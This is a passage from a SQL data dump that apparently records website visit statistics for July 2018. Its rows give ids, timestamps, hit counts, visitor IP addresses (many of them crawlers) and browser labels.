1530729153,1,1,0,0,'35.153.83.126','other'),(267685,1530729284,3,3,0,0,'216.244.66.241','other'),(267686,1530729870,1,1,0,0,'54.36.149.94','other'),(267687,1530729883,1,1,0,0,'54.36.148.236','other'),(267688,1530729940,1,1,0,0,'188.230.43.254','other'),(267689,1530729969,1,1,0,0,'54.36.148.53','other'),(267690,1530730024,1,1,0,0,'54.36.149.25','other'),(267691,1530730069,1,1,0,0,'52.87.14.196','other'),(267692,1530730076,1,1,0,0,'91.121.83.160','chrome'),(267693,1530730197,1,1,0,0,'8.29.198.25','other'),(267694,1530730208,1,1,0,0,'35.153.83.126','other'),(267695,1530730219,1,1,0,0,'178.154.171.88','other'),(267696,1530730261,1,1,0,0,'54.36.148.16','other'),(267697,1530730272,1,1,0,0,'54.36.149.23','other'),(267698,1530730614,1,1,0,0,'141.8.142.74','other'),(267699,1530730652,2,2,0,0,'157.55.39.100','other'),(267700,1530731246,1,1,0,0,'52.87.14.196','other'),(267701,1530731292,1,1,0,0,'35.153.83.126','other'),(267702,1530731515,1,1,0,0,'141.8.142.74','other'),(267703,1530731701,1,1,0,0,'54.36.148.69','other'),(267704,1530731746,1,1,0,0,'216.244.66.241','other'),(267705,1530731801,1,1,0,0,'157.55.39.100','other'),(267706,1530732090,1,1,0,0,'95.163.255.183','other'),(267707,1530732100,2,2,0,0,'95.163.255.181','other'),(267708,1530732168,1,1,0,0,'54.36.148.44','other'),(267709,1530732269,1,1,0,0,'35.153.83.126','other'),(267710,1530732515,1,1,0,0,'52.87.14.196','other'),(267711,1530732556,2,2,0,0,'141.8.142.74','other'),(267712,1530732938,1,1,0,0,'180.76.15.137','other'),(267713,1530732981,1,1,0,0,'54.36.148.79','other'),(267714,1530733205,1,1,0,0,'95.163.255.99','other'),(267715,1530733292,1,1,0,0,'35.153.83.126','other'),(267716,1530733403,1,1,0,0,'54.36.148.58','other'),(267717,1530733590,1,1,0,0,'52.87.14.196','other'),(267718,1530733807,1,1,0,0,'54.36.148.37','other'),(267719,1530733940,8,8,0,0,'216.244.66.241','other'),(267720,1530734021,1,1,0,0,'54.36.149.87','other'),(267721,1530734104,1,1,0,0,'54.36.148.38','other'),(267722,1530734163,1,1,0,0,'54.36.148.206','other'),(267723,1530734318,1,1,0,0,'35.153.83.126','other'),(267724,1530734769,1,1,0,0,'54.36.149.60','other'),(267725,1530734801,2,2,0,0,'141.8.142.74','other'),(267726,1530735153,1,1,0,0,'54.36.148.18','other'),(267727,1530735185,1,1,0,0,'52.87.14.196','other'),(267728,1530735325,1,1,0,0,'54.36.148.100','other'),(267729,1530735356,1,1,0,0,'35.153.83.126','other'),(267730,1530735578,1,1,0,0,'54.36.149.97','other'),(267731,1530735709,1,1,0,0,'54.36.148.153','other'),(267732,1530735807,2,2,0,0,'141.8.142.74','other'),(267733,1530735885,1,0,1,0,'66.249.69.244',''),(267734,1530736047,1,0,1,0,'66.249.69.240',''),(267735,1530736120,1,1,0,0,'54.36.149.28','other'),(267736,1530736158,1,1,0,0,'54.36.149.37','other'),(267737,1530736218,1,1,0,0,'52.87.14.196','other'),(267738,1530736261,1,1,0,0,'54.36.148.206','other'),(267739,1530736381,1,1,0,0,'35.153.83.126','other'),(267740,1530736578,1,1,0,0,'54.36.149.11','other'),(267741,1530736694,1,1,0,0,'8.29.198.26','other'),(267742,1530736880,1,1,0,0,'216.244.66.241','other'),(267743,1530737077,2,1,1,0,'66.249.69.187',''),(267744,1530737109,1,0,1,0,'66.249.69.185',''),(267745,1530737146,1,0,1,0,'66.249.69.228',''),(267746,1530737250,1,1,0,0,'66.249.69.230','chrome'),(267747,1530737298,1,1,0,0,'52.87.14.196','other'),(267748,1530737554,1,1,0,0,'35.153.83.126','other'),(267749,1530737865,3,1,2,0,'66.249.69.228',''),(267750,1530737868,1,1,0,0,'95.163.255.161','other'),(267751,1530737891,1,1,0,0,'141.8.142.74','other'),(267752,1530737935,1,1,0,0,'54.36.148.228','other'),(267753,1530738139,1,1,0,0,'95.163.255.175','other'),(267754,1530738194,1,1,0,0,'77.139.25.41','chrome'),(267755,1530738205,1,1,0,0,'216.244.66.241','other'),(267756,1530738395,1,1,0,0,'54.36.148.58','other'),(267757,1530738482,1,1,0,0,'54.36.148.143','other'),(267758,1530738539,1,0,1,0,'66.249.69.185',''),(267759,1530738555,1,1,0,0,'35.153.83.126','other'),(267760,1530738570,1,1,0,0,'207.46.13.26','other'),(267761,1530738623,1,1,0,0,'52.87.14.196','other'),(267762,1530738762,1,1,0,0,'95.163.255.95','other'),(267763,1530738844,1,1,0,0,'178.154.200.41','other'),(267764,1530738873,2,0,2,0,'66.249.69.230',''),(267765,1530739079,1,0,1,0,'66.249.69.232',''),(267766,1530739109,1,1,0,0,'173.249.24.45','chrome'),(267767,1530739179,2,0,2,0,'66.249.69.228',''),(267768,1530739220,1,1,0,0,'54.36.148.136','other'),(267769,1530739430,1,1,0,0,'157.55.39.97','other'),(267770,1530739433,1,1,0,0,'95.163.255.99','other'),(267771,1530739442,1,1,0,0,'95.163.255.97','other'),(267772,1530739508,1,1,0,0,'54.36.148.81','other'),(267773,1530739577,1,1,0,0,'35.153.83.126','other'),(267774,1530739713,1,1,0,0,'54.36.148.40','other'),(267775,1530739818,1,1,0,0,'52.87.14.196','other'),(267776,1530739821,2,2,0,0,'178.154.171.88','other'),(267777,1530739864,3,3,0,0,'216.244.66.241','other'),(267778,1530740108,1,1,0,0,'178.154.171.4','other'),(267779,1530740289,3,3,0,0,'144.76.120.197','other'),(267780,1530740305,3,0,3,0,'66.249.69.228',''),(267781,1530740568,1,0,1,0,'66.249.69.232',''),(267782,1530740738,1,1,0,0,'35.153.83.126','other'),(267783,1530740767,1,1,0,0,'52.87.14.196','other'),(267784,1530741037,1,1,0,0,'8.29.198.26','other'),(267785,1530741206,1,1,0,0,'95.163.255.104','other'),(267786,1530741213,1,1,0,0,'95.163.255.112','other'),(267787,1530741220,1,1,0,0,'95.163.255.115','other'),(267788,1530741250,1,0,1,0,'66.249.69.228',''),(267789,1530741650,1,1,0,0,'35.153.83.126','other'),(267790,1530741736,5,5,0,0,'216.244.66.241','other'),(267791,1530741737,1,1,0,0,'141.8.142.74','other'),(267792,1530741741,1,1,0,0,'52.87.14.196','other'),(267793,1530741743,2,2,0,0,'178.154.171.88','other'),(267794,1530742037,1,1,0,0,'54.36.148.222','other'),(267795,1530742183,2,0,2,0,'66.249.69.232',''),(267796,1530742209,1,1,0,0,'54.36.148.116','other'),(267797,1530742265,1,0,1,0,'66.249.69.230',''),(267798,1530742293,1,1,0,0,'54.36.149.22','other'),(267799,1530742713,1,1,0,0,'52.87.14.196','other'),(267800,1530743141,1,1,0,0,'54.36.149.44','other'),(267801,1530743300,1,0,1,0,'66.249.69.232',''),(267802,1530743534,3,3,0,0,'216.244.66.241','other'),(267803,1530743553,1,1,0,0,'87.250.224.46','other'),(267804,1530743605,1,1,0,0,'54.36.148.62','other'),(267805,1530743773,1,0,1,0,'66.249.69.230',''),(267806,1530743797,1,1,0,0,'52.87.14.196','other'),(267807,1530743911,1,1,0,0,'35.153.83.126','other'),(267808,1530744214,1,1,0,0,'54.36.148.214','other'),(267809,1530744363,1,1,0,0,'54.36.149.18','other'),(267810,1530744606,1,1,0,0,'95.163.255.112','other'),(267811,1530744637,1,1,0,0,'54.36.149.17','other'),(267812,1530744961,1,1,0,0,'52.87.14.196','other'),(267813,1530745035,2,1,1,0,'66.249.69.232',''),(267814,1530745112,1,1,0,0,'216.244.66.241','other'),(267815,1530745700,4,0,4,0,'66.249.69.230',''),(267816,1530745762,1,1,0,0,'54.36.148.128','other'),(267817,1530745782,1,1,0,0,'54.36.148.123','other'),(267818,1530745872,1,1,0,0,'52.87.14.196','other'),(267819,1530746070,1,1,0,0,'157.55.39.97','other'),(267820,1530746085,1,1,0,0,'54.36.148.137','other'),(267821,1530746169,3,3,0,0,'216.244.66.241','other'),(267822,1530746311,2,0,2,0,'66.249.69.228',''),(267823,1530746464,1,1,0,0,'54.36.148.103','other'),(267824,1530746692,1,1,0,0,'54.36.149.42','other'),(267825,1530746724,2,0,2,0,'66.249.69.232',''),(267826,1530746731,1,1,0,0,'157.55.39.100','other'),(267827,1530746858,1,1,0,0,'178.154.171.88','other'),(267828,1530746923,1,1,0,0,'52.87.14.196','other'),(267829,1530747043,1,1,0,0,'54.36.148.230','other'),(267830,1530747108,1,1,0,0,'54.36.149.1','other'),(267831,1530747227,3,3,0,0,'173.208.200.154','other'),(267832,1530747302,2,2,0,0,'141.8.142.74','other'),(267833,1530747385,4,4,0,0,'216.244.66.241','other'),(267834,1530747542,1,1,0,0,'8.29.198.27','other'),(267835,1530747739,1,0,1,0,'66.249.69.232',''),(267836,1530747844,1,1,0,0,'52.87.14.196','other'),(267837,1530748266,1,1,0,0,'54.36.149.66','other'),(267838,1530748364,1,1,0,0,'54.36.148.86','other'),(267839,1530748615,1,1,0,0,'54.36.149.8','other'),(267840,1530748677,3,0,3,0,'66.249.69.230',''),(267841,1530749077,1,1,0,0,'54.36.149.79','other'),(267842,1530749887,2,2,0,0,'141.8.142.74','other'),(267843,1530750195,3,3,0,0,'216.244.66.241','other'),(267844,1530750315,2,0,2,0,'66.249.69.228',''),(267845,1530750348,1,1,0,0,'54.36.148.10','other'),(267846,1530750452,1,1,0,0,'178.154.171.88','other'),(267847,1530750460,1,1,0,0,'54.36.149.85','other'),(267848,1530750973,1,0,1,0,'66.249.69.185',''),(267849,1530751215,2,0,2,0,'66.249.69.230',''),(267850,1530751359,1,1,0,0,'178.154.171.88','other'),(267851,1530751368,2,0,2,0,'66.249.69.232',''),(267852,1530751420,1,1,0,0,'54.36.148.131','other'),(267853,1530751765,1,1,0,0,'54.36.148.253','other'),(267854,1530751878,1,1,0,0,'8.29.198.25','other'),(267855,1530751953,2,2,0,0,'141.8.142.74','other'),(267856,1530752076,3,3,0,0,'216.244.66.241','other'),(267857,1530752117,1,1,0,0,'91.121.83.160','chrome'),(267858,1530752177,1,0,1,0,'66.249.69.228',''),(267859,1530752303,3,0,3,0,'66.249.69.230',''),(267860,1530752361,1,1,0,0,'54.36.148.182','other'),(267861,1530752666,1,1,0,0,'178.154.171.88','other'),(267862,1530752978,1,1,0,0,'54.36.148.188','other'),(267863,1530753016,1,1,0,0,'216.244.66.241','other'),(267864,1530753293,1,0,1,0,'66.249.69.185',''),(267865,1530753372,1,0,1,0,'66.249.69.232',''),(267866,1530753394,1,0,1,0,'66.249.69.189',''),(267867,1530753414,1,0,1,0,'66.249.69.228',''),(267868,1530753434,1,1,0,0,'54.36.149.49','other'),(267869,1530753565,1,1,0,0,'54.36.148.52','other'),(267870,1530754134,1,1,0,0,'141.8.142.134','other'),(267871,1530754144,1,1,0,0,'37.9.113.151','other'),(267872,1530754145,1,1,0,0,'54.36.148.195','other'),(267873,1530754154,1,1,0,0,'37.9.113.182','other'),(267874,1530754164,1,1,0,0,'5.45.207.58','other'),(267875,1530754198,1,1,0,0,'178.154.171.88','other'),(267876,1530754304,1,1,0,0,'54.36.148.40','other'),(267877,1530754374,1,0,1,0,'66.249.69.189',''),(267878,1530754400,3,0,3,0,'66.249.69.232',''),(267879,1530754528,1,1,0,0,'157.55.39.102','other'),(267880,1530754557,1,1,0,0,'54.36.148.143','other'),(267881,1530754751,3,0,3,0,'66.249.69.228',''),(267882,1530754768,2,0,2,0,'66.249.69.230',''),(267883,1530754948,2,2,0,0,'216.244.66.241','other'),(267884,1530755505,1,0,1,0,'66.249.69.189',''),(267885,1530755649,1,1,0,0,'54.36.148.22','other'),(267886,1530755820,2,2,0,0,'141.8.142.74','other'),(267887,1530755824,2,0,2,0,'66.249.69.230',''),(267888,1530756161,2,1,1,0,'66.249.69.228',''),(267889,1530756192,2,0,2,0,'66.249.69.232',''),(267890,1530756430,1,1,0,0,'54.36.148.167','other'),(267891,1530756452,1,1,0,0,'54.36.148.198','other'),(267892,1530756458,1,1,0,0,'216.244.66.241','other'),(267893,1530756532,1,1,0,0,'54.36.149.70','other'),(267894,1530756823,4,0,4,0,'66.249.69.230',''),(267895,1530757212,1,1,0,0,'54.36.149.74','other'),(267896,1530757237,1,1,0,0,'157.55.39.100','other'),(267897,1530757434,1,1,0,0,'173.212.233.72','other'),(267898,1530757435,1,1,0,0,'173.212.233.72','msie'),(267899,1530757818,1,0,1,0,'66.249.69.232',''),(267900,1530757970,1,1,0,0,'54.36.148.182','other'),(267901,1530758165,2,2,0,0,'216.244.66.241','other'),(267902,1530758201,1,1,0,0,'54.36.149.60','other'),(267903,1530758258,1,0,1,0,'66.249.69.230',''),(267904,1530758318,1,1,0,0,'95.163.255.112','other'),(267905,1530758326,4,4,0,0,'95.163.255.118','other'),(267906,1530758336,2,2,0,0,'95.163.255.115','other'),(267907,1530758342,2,2,0,0,'95.163.255.114','other'),(267908,1530758349,1,1,0,0,'54.36.148.67','other'),(267909,1530758356,4,4,0,0,'95.163.255.103','other'),(267910,1530758371,2,2,0,0,'95.163.255.102','other'),(267911,1530758378,2,2,0,0,'95.163.255.116','other'),(267912,1530758399,1,1,0,0,'8.29.198.27','other'),(267913,1530758400,2,2,0,0,'95.163.255.106','other'),(267914,1530758405,1,1,0,0,'95.163.255.105','other'),(267915,1530758415,3,3,0,0,'95.163.255.104','other'),(267916,1530758456,2,2,0,0,'95.163.255.113','other'),(267917,1530758463,2,2,0,0,'95.163.255.107','other'),(267918,1530758487,1,1,0,0,'95.163.255.119','other'),(267919,1530758664,1,1,0,0,'95.163.255.167','other'),(267920,1530758764,3,0,3,0,'66.249.69.228',''),(267921,1530759315,1,1,0,0,'54.36.149.93','other'),(267922,1530759539,1,1,0,0,'54.36.148.53','other'),(267923,1530759602,1,1,0,0,'54.36.148.25','other'),(267924,1530759617,1,1,0,0,'54.36.149.85','other'),(267925,1530759716,1,1,0,0,'54.36.149.12','other'),(267926,1530759745,1,1,0,0,'54.36.148.118','other'),(267927,1530759877,1,1,0,0,'54.36.148.126','other'),(267928,1530760170,3,3,0,0,'216.244.66.241','other'),(267929,1530760368,1,1,0,0,'54.36.148.19','other'),(267930,1530760804,1,0,1,0,'66.249.69.246',''),(267931,1530760843,1,1,0,0,'91.196.178.47','chrome'),(267932,1530760934,1,1,0,0,'91.196.178.90','other'),(267933,1530760935,1,1,0,0,'91.196.178.90','msie'),(267934,1530760937,1,1,0,0,'91.196.178.90','firefox'),(267935,1530760963,1,1,0,0,'54.36.148.195','other'),(267936,1530761165,5,0,5,0,'66.249.69.228',''),(267937,1530761217,1,1,0,0,'178.154.171.88','other'),(267938,1530761317,2,1,1,0,'66.249.69.232',''),(267939,1530761605,1,1,0,0,'54.36.148.78','other'),(267940,1530761923,2,0,2,0,'66.249.69.230',''),(267941,1530762298,4,4,0,0,'216.244.66.241','other'),(267942,1530762313,2,0,2,0,'66.249.69.228',''),(267943,1530762360,1,0,1,0,'66.249.69.232',''),(267944,1530762710,1,1,0,0,'8.29.198.25','other'),(267945,1530763008,1,1,0,0,'87.250.224.46','other'),(267946,1530763056,1,1,0,0,'141.8.142.74','other'),(267947,1530763420,1,0,1,0,'66.249.69.228',''),(267948,1530763522,1,0,1,0,'66.249.69.185',''),(267949,1530763922,1,1,0,0,'54.36.149.80','other'),(267950,1530763938,1,1,0,0,'37.9.113.101','other'),(267951,1530764326,2,0,2,0,'66.249.69.228',''),(267952,1530764376,1,1,0,0,'95.163.255.161','other'),(267953,1530764378,1,1,0,0,'95.163.255.156','other'),(267954,1530764571,1,1,0,0,'54.36.148.185','other'),(267955,1530764594,1,1,0,0,'54.36.148.25','other'),(267956,1530764634,4,0,4,0,'66.249.69.230',''),(267957,1530764647,1,0,1,0,'66.249.69.189',''),(267958,1530764771,4,4,0,0,'216.244.66.241','other'),(267959,1530764839,3,0,3,0,'66.249.69.232',''),(267960,1530765366,1,1,0,0,'54.36.148.86','other'),(267961,1530765555,1,1,0,0,'188.230.43.254','other'),(267962,1530765682,1,1,0,0,'37.9.113.182','other'),(267963,1530765711,1,1,0,0,'54.36.148.10','other'),(267964,1530765714,1,1,0,0,'54.36.148.83','other'),(267965,1530765759,1,1,0,0,'141.8.142.74','other'),(267966,1530765819,1,1,0,0,'216.244.66.241','other'),(267967,1530765832,1,1,0,0,'54.36.148.76','other'),(267968,1530765881,2,0,2,0,'66.249.69.230',''),(267969,1530766302,1,1,0,0,'54.36.148.231','other'),(267970,1530766317,1,1,0,0,'54.36.149.40','other'),(267971,1530766329,1,0,1,0,'66.249.69.228',''),(267972,1530766365,1,1,0,0,'54.36.149.51','other'),(267973,1530766519,1,1,0,0,'66.249.69.228','chrome'),(267974,1530766760,2,2,0,0,'95.163.255.94','other'),(267975,1530766949,1,1,0,0,'157.55.39.97','other'),(267976,1530767027,1,1,0,0,'54.36.148.33','other'),(267977,1530767082,2,2,0,0,'141.8.142.74','other'),(267978,1530767119,2,2,0,0,'216.244.66.241','other'),(267979,1530767205,1,0,1,0,'66.249.69.232',''),(267980,1530767596,1,1,0,0,'54.36.148.249','other'),(267981,1530767777,2,0,2,0,'66.249.69.228',''),(267982,1530767838,1,1,0,0,'157.55.39.100','other'),(267983,1530767972,1,1,0,0,'91.196.178.75','chrome'),(267984,1530768121,1,1,0,0,'91.196.178.68','chrome'),(267985,1530768172,1,1,0,0,'188.230.43.254','other'),(267986,1530768233,3,3,0,0,'216.244.66.241','other'),(267987,1530768514,2,0,2,0,'66.249.69.230',''),(267988,1530768685,1,1,0,0,'54.36.149.32','other'),(267989,1530768716,1,1,0,0,'54.36.148.111','other'),(267990,1530768730,1,1,0,0,'54.36.148.52','other'),(267991,1530768939,1,1,0,0,'54.36.148.38','other'),(267992,1530769052,1,1,0,0,'91.196.178.68','chrome'),(267993,1530769136,4,0,4,0,'66.249.69.228',''),(267994,1530769240,1,1,0,0,'8.29.198.27','other'),(267995,1530769316,1,1,0,0,'178.92.137.25','firefox'),(267996,1530769410,1,1,0,0,'54.36.148.198','other'),(267997,1530769518,1,1,0,0,'54.36.148.41','other'),(267998,1530769739,1,1,0,0,'54.36.148.48','other'),(267999,1530769765,1,1,0,0,'95.163.255.150','other'),(268000,1530769789,1,1,0,0,'95.163.255.191','other'),(268001,1530769819,4,0,4,0,'66.249.69.230',''),(268002,1530769820,3,0,3,0,'66.249.69.232',''),(268003,1530769969,1,1,0,0,'54.36.149.75','other'),(268004,1530769992,1,1,0,0,'54.36.148.244','other'),(268005,1530770170,1,1,0,0,'54.36.148.144','other'),(268006,1530770213,4,4,0,0,'216.244.66.241','other'),(268007,1530770227,1,1,0,0,'91.233.90.33','other'),(268008,1530770299,1,1,0,0,'54.36.148.54','other'),(268009,1530770331,2,2,0,0,'91.196.178.85','chrome'),(268010,1530770362,1,1,0,0,'188.230.43.254','other'),(268011,1530770592,2,0,2,0,'66.249.69.228',''),(268012,1530770920,1,0,1,0,'66.249.69.185',''),(268013,1530770923,1,1,0,0,'54.36.148.206','other'),(268014,1530770971,1,1,0,0,'54.36.148.48','other'),(268015,1530770972,1,0,1,0,'66.249.69.230',''),(268016,1530771382,2,2,0,0,'195.10.210.70','chrome'),(268017,1530771427,1,1,0,0,'66.249.69.230','chrome'),(268018,1530771846,1,1,0,0,'46.200.28.178','chrome'),(268019,1530771971,1,1,0,0,'180.76.15.160','other'),(268020,1530772030,1,0,1,0,'66.249.69.228',''),(268021,1530772049,2,2,0,0,'91.196.178.75','chrome'),(268022,1530772114,1,0,1,0,'66.249.69.232',''),(268023,1530772256,1,1,0,0,'54.36.148.102','other'),(268024,1530772936,3,3,0,0,'216.244.66.241','other'),(268025,1530772994,1,0,1,0,'66.249.69.228',''),(268026,1530773173,1,1,0,0,'54.36.148.86','other'),(268027,1530773281,1,1,0,0,'66.249.69.187','chrome'),(268028,1530773540,1,1,0,0,'8.29.198.27','other'),(268029,1530773610,1,1,0,0,'54.36.148.90','other'),(268030,1530774213,2,0,2,0,'66.249.69.232',''),(268031,1530774354,1,1,0,0,'54.36.148.117','other'),(268032,1530774455,2,0,2,0,'66.249.69.228',''),(268033,1530774681,1,1,0,0,'54.36.148.157','other'),(268034,1530774791,1,1,0,0,'54.36.148.176','other'),(268035,1530774931,2,0,2,0,'66.249.69.230',''),(268036,1530775030,1,1,0,0,'54.36.148.46','other'),(268037,1530775264,6,6,0,0,'216.244.66.241','other'),(268038,1530775428,1,1,0,0,'54.36.148.201','other'),(268039,1530775625,1,1,0,0,'54.36.148.205','other'),(268040,1530775635,1,1,0,0,'54.36.148.104','other'),(268041,1530775641,1,1,0,0,'54.36.148.249','other'),(268042,1530775689,1,1,0,0,'54.36.149.98','other'),(268043,1530775712,1,1,0,0,'54.36.149.73','other'),(268044,1530775843,1,0,1,0,'66.249.69.228',''),(268045,1530775967,2,2,0,0,'141.8.142.74','other'),(268046,1530776068,1,1,0,0,'178.154.171.88','other'),(268047,1530776208,2,2,0,0,'91.210.110.90','firefox'),(268048,1530776545,1,1,0,0,'136.243.74.70','other'),(268049,1530776626,1,1,0,0,'54.36.148.143','other'),(268050,1530776727,1,1,0,0,'54.36.148.223','other'),(268051,1530776747,1,1,0,0,'54.36.148.177','other'),(268052,1530776930,1,0,1,0,'66.249.69.232',''),(268053,1530776939,3,0,3,0,'66.249.69.228',''),(268054,1530776959,1,1,0,0,'141.8.142.74','other'),(268055,1530777042,3,0,3,0,'66.249.69.230',''),(268056,1530777499,1,1,0,0,'92.112.125.72','firefox'),(268057,1530777709,1,1,0,0,'54.36.148.115','other'),(268058,1530777834,1,1,0,0,'94.178.111.13','chrome'),(268059,1530777998,1,1,0,0,'141.8.142.74','other'),(268060,1530778028,1,1,0,0,'54.36.149.98','other'),(268061,1530778108,2,2,0,0,'95.163.255.95','other'),(268062,1530778161,1,1,0,0,'54.36.148.145','other'),(268063,1530778344,1,1,0,0,'91.196.179.25','chrome'),(268064,1530778351,1,1,0,0,'54.36.148.14','other'),(268065,1530778476,1,1,0,0,'37.54.96.203','chrome'),(268066,1530778570,1,1,0,0,'54.36.148.76','other'),(268067,1530778867,1,1,0,0,'216.244.66.241','other'),(268068,1530779023,1,0,1,0,'66.249.69.232',''),(268069,1530779083,1,1,0,0,'54.36.148.142','other'),(268070,1530779459,1,1,0,0,'54.36.149.57','other'),(268071,1530779724,1,1,0,0,'54.36.149.92','other'),(268072,1530779781,1,1,0,0,'178.154.200.28','other'),(268073,1530779812,1,1,0,0,'91.196.178.103','chrome'),(268074,1530779909,5,5,0,0,'198.211.126.107','chrome'),(268075,1530779920,1,1,0,0,'54.36.149.2','other'),(268076,1530779987,2,2,0,0,'141.8.142.74','other'),(268077,1530780027,2,2,0,0,'91.196.178.75','chrome'),(268078,1530780084,1,1,0,0,'8.29.198.25','other'),(268079,1530780110,1,1,0,0,'146.185.156.139','chrome'),(268080,1530780151,1,1,0,0,'54.36.149.79','other'),(268081,1530780214,1,1,0,0,'46.201.244.82','chrome'),(268082,1530780365,1,1,0,0,'54.36.148.142','other'),(268083,1530780380,2,2,0,0,'91.196.178.169','chrome'),(268084,1530780467,1,1,0,0,'54.36.149.50','other'),(268085,1530780607,1,1,0,0,'54.36.148.210','other'),(268086,1530780611,3,0,3,0,'66.249.69.228',''),(268087,1530780619,1,1,0,0,'66.249.69.187','chrome'),(268088,1530780716,1,1,0,0,'91.220.230.187','chrome'),(268089,1530780745,1,1,0,0,'213.108.45.138','chrome'),(268090,1530780860,1,1,0,0,'91.124.182.170','firefox'),(268091,1530781023,2,2,0,0,'130.180.219.65','chrome'),(268092,1530781172,1,1,0,0,'141.8.142.74','other'),(268093,1530781598,5,0,5,0,'66.249.69.228',''),(268094,1530781599,1,1,0,0,'157.55.39.97','other'),(268095,1530781799,1,1,0,0,'54.36.148.211','other'),(268096,1530781870,1,1,0,0,'54.36.148.253','other'),(268097,1530782141,1,1,0,0,'141.8.142.74','other'),(268098,1530782183,1,1,0,0,'54.36.148.137','other'),(268099,1530782562,4,0,4,0,'66.249.69.230',''),(268100,1530782604,2,0,2,0,'66.249.69.228',''),(268101,1530782655,1,0,1,0,'66.249.69.189',''),(268102,1530782977,1,1,0,0,'54.36.148.238','other'),(268103,1530783076,23,23,0,0,'157.55.39.100','other'),(268104,1530783099,13,13,0,0,'207.46.13.26','other'),(268105,1530783112,18,18,0,0,'157.55.39.102','other'),(268106,1530783132,15,15,0,0,'157.55.39.97','other'),(268107,1530783323,1,1,0,0,'213.108.45.138','other'),(268108,1530783416,1,1,0,0,'54.36.148.62','other'),(268109,1530783550,2,1,1,0,'66.249.69.230',''),(268110,1530783588,5,5,0,0,'216.244.66.241','other'),(268111,1530783642,1,1,0,0,'95.163.255.96','other'),(268112,1530783710,2,2,0,0,'162.210.196.98','other'),(268113,1530783740,1,1,0,0,'91.121.116.72','other'),(268114,1530783765,1,1,0,0,'54.36.149.16','other'),(268115,1530784047,1,1,0,0,'54.36.149.47','other'),(268116,1530784176,1,1,0,0,'66.249.69.189','chrome'),(268117,1530784368,1,1,0,0,'8.29.198.27','other'),(268118,1530784458,1,1,0,0,'54.36.149.64','other'),(268119,1530784659,1,1,0,0,'54.36.148.205','other'),(268120,1530784709,1,1,0,0,'54.36.148.48','other'),(268121,1530784790,1,1,0,0,'66.249.69.232','chrome'),(268122,1530785144,1,1,0,0,'54.36.149.54','other'),(268123,1530785154,1,1,0,0,'66.249.69.228','chrome'),(268124,1530785556,1,1,0,0,'54.36.148.97','other'),(268125,1530785860,3,0,3,0,'66.249.69.232',''),(268126,1530785921,4,4,0,0,'216.244.66.241','other'),(268127,1530785979,1,1,0,0,'54.36.148.65','other'),(268128,1530785984,3,0,3,0,'66.249.69.230',''),(268129,1530786074,1,1,0,0,'95.163.255.172','other'),(268130,1530786224,6,0,6,0,'66.249.69.228',''),(268131,1530786307,3,3,0,0,'91.196.178.75','chrome'),(268132,1530786475,1,1,0,0,'54.36.148.227','other'),(268133,1530786847,1,1,0,0,'91.196.178.43','chrome'),(268134,1530786976,1,1,0,0,'54.36.149.72','other'),(268135,1530787004,1,1,0,0,'54.36.148.199','other'),(268136,1530787137,1,1,0,0,'207.46.13.26','other'),(268137,1530787208,2,0,2,0,'66.249.69.232',''),(268138,1530787247,1,1,0,0,'91.124.187.99','chrome'),(268139,1530787289,1,1,0,0,'54.36.149.63','other'),(268140,1530787345,1,1,0,0,'87.250.224.46','other'),(268141,1530787406,1,1,0,0,'91.196.178.129','firefox'),(268142,1530787677,2,2,0,0,'216.244.66.241','other'),(268143,1530787823,2,2,0,0,'130.180.219.65','chrome'),(268144,1530787901,1,0,1,0,'66.249.69.187',''),(268145,1530787967,1,0,1,0,'66.249.69.185',''),(268146,1530788369,1,1,0,0,'54.36.149.59','other'),(268147,1530788520,1,1,0,0,'54.36.148.117','other'),(268148,1530788570,1,0,1,0,'66.249.69.230',''),(268149,1530788574,1,0,1,0,'66.249.69.232',''),(268150,1530788712,1,1,0,0,'91.196.178.175','other'),(268151,1530788739,4,1,3,0,'66.249.69.230',''),(268152,1530788813,2,2,0,0,'216.244.66.241','other'),(268153,1530788974,1,1,0,0,'91.196.178.69','firefox'),(268154,1530789174,6,0,6,0,'66.249.69.228',''),(268155,1530789350,1,1,0,0,'91.196.177.46','chrome'),(268156,1530789402,1,0,1,0,'66.249.69.187',''),(268157,1530789521,1,1,0,0,'54.36.148.248','other'),(268158,1530789695,1,1,0,0,'138.201.205.41','other'),(268159,1530789853,1,1,0,0,'91.196.179.65','chrome'),(268160,1530790016,1,1,0,0,'54.36.148.164','other'),(268161,1530790164,4,0,4,0,'66.249.69.228',''),(268162,1530790165,1,1,0,0,'37.55.243.7','chrome'),(268163,1530790208,2,0,2,0,'66.249.69.230',''),(268164,1530790209,1,0,1,0,'66.249.69.189',''),(268165,1530790701,1,1,0,0,'109.86.89.79','chrome'),(268166,1530790741,1,1,0,0,'66.249.69.185','chrome'),(268167,1530790801,5,5,0,0,'216.244.66.241','other'),(268168,1530790865,1,1,0,0,'178.251.109.244','chrome'),(268169,1530790872,1,1,0,0,'178.154.171.88','other'),(268170,1530790945,1,1,0,0,'8.29.198.25','other'),(268171,1530791150,3,0,3,0,'66.249.69.228',''),(268172,1530791369,1,1,0,0,'176.102.223.1','chrome'),(268173,1530791477,1,0,1,0,'66.249.69.230',''),(268174,1530791493,1,1,0,0,'95.163.255.192','other'),(268175,1530791570,1,1,0,0,'95.163.255.190','other'),(268176,1530791678,1,1,0,0,'54.36.148.113','other'),(268177,1530791692,2,1,1,0,'66.249.69.228',''),(268178,1530791810,1,1,0,0,'91.196.178.92','chrome'),(268179,1530791865,1,1,0,0,'180.76.15.26','other'),(268180,1530792034,2,2,0,0,'216.244.66.241','other'),(268181,1530792285,1,1,0,0,'54.36.148.165','other'),(268182,1530792309,3,0,3,0,'66.249.69.232',''),(268183,1530792326,1,1,0,0,'54.36.148.23','other'),(268184,1530792378,1,1,0,0,'54.36.149.60','other'),(268185,1530792430,1,1,0,0,'54.36.148.112','other'),(268186,1530792567,1,0,1,0,'66.249.69.185',''),(268187,1530792784,3,3,0,0,'178.154.171.88','other'),(268188,1530792798,1,0,1,0,'66.249.69.228',''),(268189,1530792799,1,1,0,0,'193.142.219.177','chrome'),(268190,1530793082,1,1,0,0,'95.108.213.24','other'),(268191,1530793116,1,1,0,0,'141.8.142.50','other'),(268192,1530793239,5,0,5,0,'66.249.69.232',''),(268193,1530793324,1,1,0,0,'141.8.142.74','other'),(268194,1530793423,1,1,0,0,'77.52.179.135','chrome'),(268195,1530793537,1,1,0,0,'130.180.220.195','chrome'),(268196,1530793924,1,1,0,0,'54.36.148.120','other'),(268197,1530794083,1,1,0,0,'54.36.148.62','other'),(268198,1530794432,1,1,0,0,'54.36.148.33','other'),(268199,1530794476,4,0,4,0,'66.249.69.228',''),(268200,1530794541,1,1,0,0,'37.73.178.195','chrome'),(268201,153079